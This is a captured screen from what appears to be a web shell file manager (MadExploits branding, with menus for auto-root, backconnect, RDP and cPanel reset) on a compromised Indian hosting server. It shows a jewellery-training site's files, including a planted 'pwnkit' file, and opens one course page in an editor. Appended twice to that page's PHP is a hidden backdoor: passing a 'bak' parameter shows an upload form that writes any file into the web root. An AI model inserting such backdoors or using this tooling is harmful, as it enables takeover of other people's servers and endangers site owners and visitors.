Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
iigdindia.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
course
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
userfiles
[ DIR ]
drwxr-xr-x
.htaccess
281
B
-rw-r--r--
about.php
4.77
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bussiness-course.php
8.3
KB
-rw-r--r--
certificate-in-gold-appraisal....
6.41
KB
-rw-r--r--
contact.php
9.72
KB
-rw-r--r--
course.php
6.06
KB
-rw-r--r--
css.php
1.34
KB
-rw-r--r--
diamond-merchant-course.php
6.5
KB
-rw-r--r--
google559cbc7861e1a83d.html
53
B
-rw-r--r--
index.php
6.98
KB
-rw-r--r--
jeweller-business-start-up-cou...
6.62
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
sitemap.xml
1.65
KB
-rw-r--r--
verify.php
7.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jeweller-business-start-up-course.php
<?php include("admin/includes/dbconnect.php"); ?> <!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link href='index.php' hreflang="en-us" rel="alternate" /> <link rel="canonical" href="https://www.iigdindia.com/jeweller-business-start-up-course.php" /> <title>Jeweller Business Start Up Course</title> <meta name="description" content="Start your journey in the gold and diamond industry with our comprehensive business startup course. Learn the essentials of launching a successful jewelry business from industry experts at the International Institute of Gold and Diamond" /> <meta name="keywords" content="jewellery making courses hyderabad, jewellery designing courses in hyderabad, jewellery making classes near me, jewellery design course, jewellery design course hyderabad, jewellery design course in hyderabad, jewellery designer course near me,jewellery designing course fees in hyderabad, jewellery making courses near me, diamond assorting course, diamond course in india, diamonds courses, diamond assorting course fees, diamond grading course, diamond merchant course, diamond course in hyderabad," /> <!-- Facebook Meta Tags --> <meta property="og:description" content="Start your journey in the gold and diamond industry with our comprehensive business startup course. Learn the essentials of launching a successful jewelry business from industry experts at the International Institute of Gold and Diamond"> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="" /> <meta property="og:url" content="https://www.iigdindia.com"> <meta property="og:site_name" content="" /> <meta property="og:image" content=""> <meta property="article:publisher" content="https://www.facebook.com/IIGDHYDERABAD/?paipv=0&eav=AfYMX77wfGq99qmBMrEv8bu0cvWIXqL9rO0_YME0Yn92P_N3bTC8sA852hw0fRnVwoA&_rdr" /> <!-- Twitter Meta Tags --> <meta name="twitter:card" content="summary_large_image"> <meta property="twitter:domain" content="@iigdindia"> <meta property="twitter:url" content="https://www.jhweb.in/"> <meta name="twitter:title" content="" content="Start your journey in the gold and diamond industry with our comprehensive business startup course. Learn the essentials of launching a successful jewelry business from industry experts at the International Institute of Gold and Diamond"> <meta name="twitter:image" content=""> <meta name="twitter:site" content="@iigdindia" /> <?php include("includes/css.php"); ?> <script type="application/ld+json"> { "@context": "https://schema.org", "@type": "Organization", "name": "International Institute of Gold & Diamond (IIGD)", "logo": "https://www.iigdindia.com/images/12.jpg", "description": "Start your journey in the gold and diamond industry with our comprehensive business startup course. Learn the essentials of launching a successful jewelry business from industry experts at the International Institute of Gold and Diamond", "url": "https://www.iigdindia.com/jeweller-business-start-up-course.php", "image": "https://www.iigdindia.com/image/12.jpg", "telephone": "+918500501020", "email": "info@iigdindia.com", "address": { "@type": "PostalAddress", "streetAddress": "1st Floor, Mayur Kushal Complex, A-110, Gun Foundry", "addressLocality": "Abids", "addressRegion": "Hyderabad", "addressCountry": "India", "postalCode": "500001" }, "aggregateRating": { "@type": "AggregateRating", "ratingValue": "5.0", "ratingCount": "250" }, "sameAs": [ "https://www.facebook.com/IIGDHYDERABAD/?paipv=0&eav=AfYMX77wfGq99qmBMrEv8bu0cvWIXqL9rO0_YME0Yn92P_N3bTC8sA852hw0fRnVwoA&_rdr", "https://instagram.com/bsolutions", "https://www.linkedin.com/", "https://x.com/" ] } </script> </head> <body> <?php include("header.php")?> <?php $page_name = str_replace(".php", "", basename($_SERVER['PHP_SELF'])); $Current_URL = basename(dirname(__FILE__)); $findid = (mysqli_query($conn, "SELECT * FROM courses")); while ($res2=mysqli_fetch_array($findid)) { if(strtolower(str_replace(" ", "-", $res2["course_name"])) == $page_name){ $pdid = $res2["id"]; } } ?> <div class="page-banner banner-bg-one" style="background:url(images/product.jpg)"> <div class="container"> <div class="banner-text"> <?php $sqlqry = mysqli_query($conn,"select * from courses where id='$pdid'")or die (mysqli_error($conn)); $sqlres = mysqli_fetch_array($sqlqry); ?> <h1><?php echo $sqlres["title"]?></h1> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item"><a href="course.php?id=<?php echo $sqlres["id"]?>"><?php echo $sqlres["title"]?></a></li> </ol> </nav> </div> </div> </div> <section class="single-course-area pt-100 pb-20"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="single-preview-img"> <img src="assets/img/courses/<?php echo $sqlres["img"]?>" alt="Event Image"> </div> <div class="single-event-description"> <h3><?php echo $sqlres["title"]?></h3> <?php echo $sqlres["desc"]?> </div> </div> </div> </div> </section> <div class="clearfix"></div> <?php include("footer.php")?> <?php include("js.php")?> </body> </html> <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>
Close